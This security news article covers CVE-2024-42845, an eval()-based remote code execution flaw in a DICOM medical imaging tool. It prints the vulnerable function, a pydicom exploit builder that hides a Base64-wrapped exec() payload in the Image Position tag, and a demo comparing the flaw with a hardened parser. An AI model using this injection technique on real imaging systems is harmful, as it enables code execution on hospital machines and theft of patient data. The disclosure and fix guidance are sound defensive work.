A critical Remote Code Execution (RCE) vulnerability has been discovered in a popular open-source biomedical tool used worldwide.

This vulnerability, identified as CVE-2024-42845, has raised concerns about the safety of medical data and the integrity of imaging processes.

The vulnerability has been patched in the latest release, but the incident underscores the need for continuous vigilance in the healthcare software sector.

The vulnerability resides in the handling of DICOM (Digital Imaging and Communications in Medicine) files, a standard for transmitting, storing, and sharing medical images.

DICOM is widely adopted in hospitals and clinics globally, making any security flaws potentially far-reaching.


CVE-2024-42845 – the Vulnerability

The vulnerability, CVE-2024-42845, is associated with a function in the software that processes the DICOM standard tag (0x0020, 0x0032).

This tag, Image Position (Patient), holds the x, y and z coordinates of the upper-left corner voxel of an image. The issue arises because each value read from the tag is passed to Python's eval(), which evaluates whatever expression it is given: a crafted tag value therefore becomes code that runs with the privileges of the application.

def GetImagePosition(self):
    try:
        # Tag (0020,0032), looked up by the decimal string form of group and element;
        # a comma is normalised to a period before the value is evaluated
        data = self.data_image[str(0x020)][str(0x032)].replace(",", ".")
    except KeyError:
        return ""
    if data:
        # Each multi-value component is handed straight to eval().
        # The separator was lost in the page's extraction; the DICOM multi-value
        # delimiter is a backslash, which is assumed here.
        return [eval(value) for value in data.split("\\")]
    return ""

Here, the eval() function is called on data extracted from a DICOM file, allowing a malicious payload to be executed if injected into the image position index.

One obstacle for an attacker is the replace(",", ".") call in the same function, which turns every comma into a period before evaluation and so breaks payloads that depend on commas, such as calls with more than one argument. Attackers can sidestep this by Base64-encoding the payload and decoding it at runtime with the base64 module from Python's standard library: neither the Base64 alphabet nor the exec(...b64decode(...)) wrapper around it contains a comma.


Code Exploit Example

To exploit the vulnerability, an attacker modifies or creates a DICOM file, appending the payload as a fourth value in the Image Position (Patient) tag (0x0020, 0x0032) while leaving the three legitimate coordinates in place. When the affected software loads the file and the function above evaluates the tag, the payload runs.

import pydicom
import base64


def encode_payload(plain_payload):
    # Read the attacker's Python script and wrap it so that the DICOM value
    # contains no comma: the Base64 alphabet has none, and __import__ avoids a
    # separate import statement inside the expression.
    data = open(plain_payload, 'rb').read()
    return f"exec(__import__('base64').b64decode({base64.b64encode(data)}))"


def prepare_dicom_payload(dicom_file_path, payload):
    dicom_data = pydicom.dcmread(dicom_file_path)
    # Image Position (Patient): normally exactly three decimal-string values
    values = dicom_data[0x0020, 0x0032].value
    mal = [str(i) for i in values]
    # The payload is appended as a fourth value
    mal.append(encode_payload(payload))
    # Further steps to save the modified DICOM file

Securing Medical Imaging Systems

This vulnerability highlights the importance of rigorous security practices in the development and deployment of medical imaging software.

Users of the affected software are advised to update to the latest version immediately. Developers should never pass file contents to eval() or exec(): numeric DICOM values should be checked against the format their value representation allows and converted with float(), and a tag with an unexpected number of values should be rejected rather than processed.
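As an added example, not code from the affected project or from the researcher's report, the following places the eval() pattern from the vulnerable function beside a hardened parser that accepts only three well-formed DICOM Decimal String values and converts them with float(). The dictionary layout standing in for the application's data_image, the backslash multi-value separator, the MARKER list and the sample tag contents are assumptions constructed for the demonstration; the payload only appends to MARKER so the eval() path can be shown to execute attacker-controlled text without doing anything harmful.

```python
import base64
import re

# Constructed marker: the demo payload appends to it instead of doing anything
# harmful, so we can prove that the eval() path ran attacker-supplied code.
MARKER = []

# Strict form of a DICOM Decimal String (DS): optional sign, digits with an
# optional fraction, optional exponent. Nothing else is allowed through.
DS_RE = re.compile(r"[+-]?(?:\d+\.?\d*|\.\d+)(?:[eE][+-]?\d+)?")
DS_MAX_LEN = 16  # a DS value is limited to 16 characters in the standard


def get_image_position_vulnerable(data_image):
    """The eval() pattern from the vulnerable function, kept for comparison.

    data_image mirrors the page's self.data_image: a dict keyed by the decimal
    string form of group and element (assumption). The backslash separator is
    the DICOM multi-value delimiter (assumption, lost in the page's extraction).
    """
    try:
        data = data_image[str(0x020)][str(0x032)].replace(",", ".")
    except KeyError:
        return ""
    if data:
        return [eval(value) for value in data.split("\\")]
    return ""


def get_image_position_safe(data_image):
    """Hardened replacement: exactly three values, each a well-formed DS,
    parsed with float(). Anything else raises ValueError instead of running."""
    try:
        data = data_image[str(0x020)][str(0x032)]
    except KeyError:
        return ""
    if not data:
        return ""
    # Keep the original's comma-to-period normalisation for locale-style input,
    # then enforce the value multiplicity of 3 that the tag defines.
    values = data.replace(",", ".").split("\\")
    if len(values) != 3:
        raise ValueError(f"Image Position (Patient) needs 3 values, got {len(values)}")
    position = []
    for raw in values:
        value = raw.strip()
        if len(value) > DS_MAX_LEN or not DS_RE.fullmatch(value):
            raise ValueError(f"rejected non-numeric DS value: {value!r}")
        position.append(float(value))
    return position


def parses_safely(data_image):
    """True when the hardened parser accepts the tag, False when it rejects it."""
    try:
        get_image_position_safe(data_image)
        return True
    except ValueError:
        return False


def build_payload_value(python_source):
    """Wrap Python source the way the page describes: Base64 inside exec(),
    so the resulting value contains no comma for replace(",", ".") to mangle."""
    encoded = base64.b64encode(python_source.encode())
    return f"exec(__import__('base64').b64decode({encoded!r}))"


# Constructed sample tag contents (not taken from any real study).
BENIGN_IMAGE = {str(0x020): {str(0x032): "-125.0\\-125.0\\-62.5"}}
CRAFTED_IMAGE = {
    str(0x020): {
        str(0x032): "-125.0\\-125.0\\-62.5\\"
        + build_payload_value("MARKER.append('payload ran')")
    }
}


def run_demo():
    """Return what each parser does with the benign and the crafted tag."""
    results = {
        "vulnerable_benign": get_image_position_vulnerable(BENIGN_IMAGE),
        "safe_benign": get_image_position_safe(BENIGN_IMAGE),
        # The vulnerable path evaluates the fourth value, which runs the payload
        # (exec returns None, so None appears as the fourth list element).
        "vulnerable_crafted": get_image_position_vulnerable(CRAFTED_IMAGE),
    }
    results["payload_ran"] = "payload ran" in MARKER
    results["safe_accepts_crafted"] = parses_safely(CRAFTED_IMAGE)
    return results


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

The hardened parser rejects the crafted tag twice over: first on the value count, and, if the payload were placed in one of the three legitimate slots instead, on the DS format check. Validating against the value representation rather than filtering characters is the general fix; the comma replacement on the page shows why character filtering alone is not.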


As reported by the researcher Partywave, the discovery and responsible disclosure of this RCE vulnerability underline the collaborative effort required to secure open-source medical tools.

While the vulnerability has been addressed, it serves as a reminder of the ongoing challenges facing cybersecurity in healthcare.

Such efforts help strengthen cybersecurity in the medical field, protecting sensitive patient data and improving the reliability of medical technologies.
